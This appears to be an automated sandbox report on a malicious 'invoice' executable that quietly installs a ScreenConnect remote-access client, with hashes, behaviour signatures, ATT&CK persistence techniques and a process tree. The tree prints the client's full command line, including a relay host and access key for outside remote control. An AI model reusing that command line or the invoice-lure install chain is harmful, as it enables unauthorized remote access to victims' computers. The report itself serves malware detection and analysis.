Analysis
-
max time kernel
96s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
18-02-2025 08:40
General
-
Target
Invoice4231284.exe
-
Size
5.4MB
-
MD5
f223c16f11e3c4350f34d51d44498877
-
SHA1
1dc62cdb40dabc991ad3ba4dea1a342e99fdb5a5
-
SHA256
670be5276e9cfb8ac71c870902de0e55ca467c8fb3b7b7d993a91112557f9376
-
SHA512
45c3fe528fc31f99ef200153058695ae2b8bf2ef5a4e7f040b984ae36e1acb8a070301d64061c9da49f753be601542e8ad41793220b5026755639ecacb2c8fe4
-
SSDEEP
49152:xEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:GEs6efPNwJ4t1h0cG5FGJRPxow8O
Malware Config
Signatures
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in System32 directory 3 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Drops file in Program Files directory 16 IoCs
-
Drops file in Windows directory 13 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 22 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 13 IoCs
-
Modifies registry class 37 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 5 IoCs
-
Suspicious use of WriteProcessMemory 19 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Invoice4231284.exe"C:\Users\Admin\AppData\Local\Temp\Invoice4231284.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e89d9b3b19f1f9d9\ScreenConnect.ClientSetup.msi"2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 16480C486396B1D238068E1A01E05003 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE242.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240640781 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A6FD041660315468CA6AAB883F4104CA2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0924E33D360EFC7C65F97FCB5F5BAD09 E Global\MSI00002⤵
- Drops file in Windows directory
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-mopgxp-relay.screenconnect.com&p=443&s=fda6155e-41c3-411e-8cec-941f8888225c&k=BgIAAACkAABSU0ExAAgAAAEAAQDxpGM0rTI0l8R0YLrTUzvMcrFQNqikChKeeFwAqXuisgso7fbvFB9droohm6UmQv424CATiaSN1Dt5a7kzqYdmjZ4VE89TMUaaWTKGqR%2f3mJaR3nx5CFRFBOcbC4aJ%2fYGQruf%2fG%2bwSiyyJUq81chi9Q%2bjeSddfXje0sdUcQjXy%2bwQ9pYBKEIBykIjdfke7XkghkNvuPAzOOFFT3Zw51dAeVb95GKEPqua3UVbsvJelXXUIjHU9JgO8mvqdK8BkIEpRk7Kw5rM%2b9U4lOr155WB1ziC%2fwZ8c7Nh9LiDyyrrXdxR%2b431d8YgPdkT8%2fWN%2bnHbTsnYgWJodyh8tx0u7qg6t&c=joemark%20llc&c=melnimer.com&c=melnimer&c=pc&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Drops file in System32 directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe" "RunRole" "9c091ec9-ac86-47ea-be87-f92cb6721e70" "User"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (e89d9b3b19f1f9d9)\ScreenConnect.WindowsClient.exe" "RunRole" "2b7830c1-5d51-4905-bbec-8c4ae3c697ae" "System"2⤵
- Drops file in System32 directory
- Executes dropped EXE
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Authentication Package
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Privilege Escalation
Boot or Logon Autostart Execution
2Authentication Package
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD520f1023b0b5f8ca8f4c0f2419bfcd7e8
SHA142d8ae7678e84cb3f3ced928e5554a077aa63687
SHA25647659ba65900f64ce7825c938651b4cbd7aad096f19896744680263c8abbe760
SHA5121032df88a097271a2ca9cde48cb8ca714900c3233f64019666d6a5be9b170bcb8decbd0d0b7df609b681857c5a7cf7a7461c7865e6e88a82996c0f7b4d07d84c
-
Filesize
48KB
MD5d524e8e6fd04b097f0401b2b668db303
SHA19486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA25607d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5
-
Filesize
26KB
MD55cd580b22da0c33ec6730b10a6c74932
SHA10b6bded7936178d80841b289769c6ff0c8eead2d
SHA256de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787
-
Filesize
192KB
MD53724f06f3422f4e42b41e23acb39b152
SHA11220987627782d3c3397d4abf01ac3777999e01c
SHA256ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
SHA512509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
Filesize
254KB
MD55adcb5ae1a1690be69fd22bdf3c2db60
SHA109a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73
-
Filesize
588KB
MD51778204a8c3bc2b8e5e4194edbaf7135
SHA10203b65e92d2d1200dd695fe4c334955befbddd3
SHA256600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31
SHA512a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69
-
Filesize
266B
MD5728175e20ffbceb46760bb5e1112f38b
SHA12421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA25687c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7
-
Filesize
822KB
MD5be74ab7a848a2450a06de33d3026f59e
SHA121568dcb44df019f9faf049d6676a829323c601e
SHA2567a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA5122643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc
-
Filesize
966B
MD54eabdff6f9541028a04c6545e3d5f5d1
SHA1443355dfa6114888c33e58b1ff92514095fe2766
SHA256bb73642dc1ca7f1597227b96694d444311f5c350afffa8d84d95737d2ea47297
SHA5121ee61c91f69f84d098ea52cf10af1dedb4d7ca3adb4a8550188348862425bcb4e72f6f635429f1451c30573fca8c4199a049c74b70d0a1bb0a110aca8eab7895
-
Filesize
1.0MB
MD58a8767f589ea2f2c7496b63d8ccc2552
SHA1cc5de8dd18e7117d8f2520a51edb1d165cae64b0
SHA2560918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b
SHA512518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4
-
Filesize
172KB
MD55ef88919012e4a3d8a1e2955dc8c8d81
SHA1c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA2563e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA5124544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684
-
Filesize
536KB
MD514e7489ffebbb5a2ea500f796d881ad9
SHA10323ee0e1faa4aa0e33fb6c6147290aa71637ebd
SHA256a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a
SHA5122110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd
-
Filesize
11KB
MD573a24164d8408254b77f3a2c57a22ab4
SHA1ea0215721f66a93d67019d11c4e588a547cc2ad6
SHA256d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62
SHA512650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844
-
Filesize
1.6MB
MD59ad3964ba3ad24c42c567e47f88c82b2
SHA16b4b581fc4e3ecb91b24ec601daa0594106bcc5d
SHA25684a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0
SHA512ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097
-
Filesize
7.9MB
MD58e273d26a4e4445eed7eb547abc90fdf
SHA1bae6d03e7ccb25727694f4e7fa881ca847d9ff9d
SHA256fed2655cc2561d9a4eaaf273df7d4fa428b2078e5551b87ffc63fe3d65fb0962
SHA512b4c3057446b00f5a27d02c0443695b66198d6aa1b510b488dca9df9e926ca7ad7af655d111b816608a6dc34072a12a0164708de2166f5d73a1648a0ee3db2a17
-
Filesize
202KB
MD5ba84dd4e0c1408828ccc1de09f585eda
SHA1e8e10065d479f8f591b9885ea8487bc673301298
SHA2563cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA5127a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
-
Filesize
1.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
560KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
5.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
600KB
-
Filesize
96KB
-
Filesize
96KB
-
Filesize
1.5MB
-
Filesize
1.7MB
-
Filesize
560KB
-
Filesize
260KB
-
Filesize
184KB
-
Filesize
1.7MB
-
Filesize
560KB
-
Filesize
40KB
-
Filesize
840KB
-
Filesize
584KB
-
Filesize
260KB
-
Filesize
96KB
-
Filesize
216KB
-
Filesize
320KB
-
Filesize
840KB